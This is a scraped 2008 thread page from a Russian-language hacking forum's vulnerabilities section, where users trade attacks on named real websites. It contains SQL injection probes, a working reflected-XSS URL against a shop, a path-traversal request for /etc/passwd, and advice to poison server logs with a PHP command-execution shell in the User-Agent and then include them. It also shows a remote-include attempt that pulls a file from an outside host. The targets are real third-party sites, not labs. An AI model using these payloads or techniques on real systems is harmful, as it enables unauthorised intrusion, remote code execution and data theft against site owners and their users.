ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ_OLD > Уязвимости
Перезагрузить страницу Ваши вопросы по уязвимостям.
   
 
Страница 71 из 1393 « Первая < 2161 67 68 69 70 71 72 73 74 75 811211715711071 > Последняя »
 
Опции темы Поиск в этой теме Опции просмотра

  #701  
Старый 15.01.2008, 09:35
KIR@PRO
Постоянный
Регистрация: 26.12.2007
Сообщений: 353
Провел на форуме:
905389

Репутация: 332
Отправить сообщение для KIR@PRO с помощью ICQ
По умолчанию
Помогите вот с этим :

MySQL error : You have an error in your SQL syntax near ''A variable type check failed, expecting G/INT for \"s\" : 20\' - /index.php?zh=' at line 1

URL: http://www.nu-44.ru/index.php?zh=topics&s=20'

и что можно получить из этого по максимуму.... тока не ломайте его он мне нужен рабочим плизззз
 

  #702  
Старый 15.01.2008, 09:46
it's my
Banned
Регистрация: 29.09.2007
Сообщений: 512
Провел на форуме:
4038468

Репутация: 1224


Отправить сообщение для it's my с помощью ICQ
По умолчанию
там фильтрация стоит навряд-ли, что можно сделать
 

  #703  
Старый 15.01.2008, 12:54
KIR@PRO
Постоянный
Регистрация: 26.12.2007
Сообщений: 353
Провел на форуме:
905389

Репутация: 332
Отправить сообщение для KIR@PRO с помощью ICQ
По умолчанию
Хорошо а тогда что мона с этим сделать???
_http://shop.winm.ru/index.php?productID=262'

ошибка:
Цитата:
You have an error in your SQL syntax near ''262''' at line 1 SQL query : SELECT categoryID FROM SS_products WHERE productID='262''
Последний раз редактировалось KIR@PRO; 17.01.2008 в 02:58..
 

  #704  
Старый 15.01.2008, 12:57
it's my
Banned
Регистрация: 29.09.2007
Сообщений: 512
Провел на форуме:
4038468

Репутация: 1224


Отправить сообщение для it's my с помощью ICQ
По умолчанию
на тебе XSS'ку
Код:
http://shop.winm.ru/index.php?searchstring=%22%3E%3Cscript%3Ealert%28%22XSS%22%29%3C%2Fscript%3E%3Cp+aling%22&x=0&y=0
 

  #705  
Старый 15.01.2008, 16:46
KIR@PRO
Постоянный
Регистрация: 26.12.2007
Сообщений: 353
Провел на форуме:
905389

Репутация: 332
Отправить сообщение для KIR@PRO с помощью ICQ
По умолчанию
На кой мне XSS я их итак тама сотними понаходил..... я же сказал мне надо сделать sql-inject
 

  #706  
Старый 15.01.2008, 16:49
KIR@PRO
Постоянный
Регистрация: 26.12.2007
Сообщений: 353
Провел на форуме:
905389

Репутация: 332
Отправить сообщение для KIR@PRO с помощью ICQ
По умолчанию
Цитата:
Сообщение от it's my  
на тебе XSS'ку
Код:
http://shop.winm.ru/index.php?searchstring=%22%3E%3Cscript%3Ealert%28%22XSS%22%29%3C%2Fscript%3E%3Cp+aling%22&x=0&y=0
темболее это именна та которую самой первой нашел после 5 минут на сайте.... я ж написал подскажите проявите себя нужна sql-инъекция
 

  #707  
Старый 15.01.2008, 22:20
tusman
Познающий
Регистрация: 02.06.2007
Сообщений: 39
Провел на форуме:
553176

Репутация: 15
По умолчанию
Народ как использовать данные уязвимости -
http://www.planeta.ua/fc/template.php?filename=../../../../../../../../../../../../../../../../../etc/passwd
Если можно то по подробней пожалуйста !
Спасибо !
 

  #708  
Старый 15.01.2008, 23:32
+toxa+
[Лишённый самовыражени
Регистрация: 16.01.2005
Сообщений: 1,787
Провел на форуме:
9751379

Репутация: 3812


Отправить сообщение для +toxa+ с помощью ICQ Отправить сообщение для +toxa+ с помощью AIM
По умолчанию
там кодес типа
PHP код:
...
include($_GET['filename']);
... 
посему те надо наследить в логах (например с юзер-агентом <? system($_GET[cmd]);?> ) и потом их проинклудить

удалённый инклуд не катит ибо так настроен сервер
http://www.planeta.ua/fc/template.php?filename=http://toxa.nov.ru/z.txt
__________________
 

  #709  
Старый 16.01.2008, 00:56
tusman
Познающий
Регистрация: 02.06.2007
Сообщений: 39
Провел на форуме:
553176

Репутация: 15
По умолчанию
Цитата:
посему те надо наследить в логах (например с юзер-агентом <? system($_GET[cmd]);?> ) и потом их проинклудить
можно по подробней пожалуйста ! или где об этом можно почитать ?
 

  #710  
Старый 16.01.2008, 13:33
noneim
Новичок
Регистрация: 28.11.2007
Сообщений: 5
Провел на форуме:
33325

Репутация: 0
По умолчанию
Код:
http://www.2016usgirlsjunior.org/questions/faqs/handicap_answer.asp?FAQidx=15'+GROUP+BY+1--
Вот эта инъёкция какая то странная... никак не могу врубится, почему не работают union, group by, и т.п., хотя через ; запросы выполняются
 
 
Страница 71 из 1393 « Первая < 2161 67 68 69 70 71 72 73 74 75 811211715711071 > Последняя »



« Предыдущая тема | Следующая тема »


Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ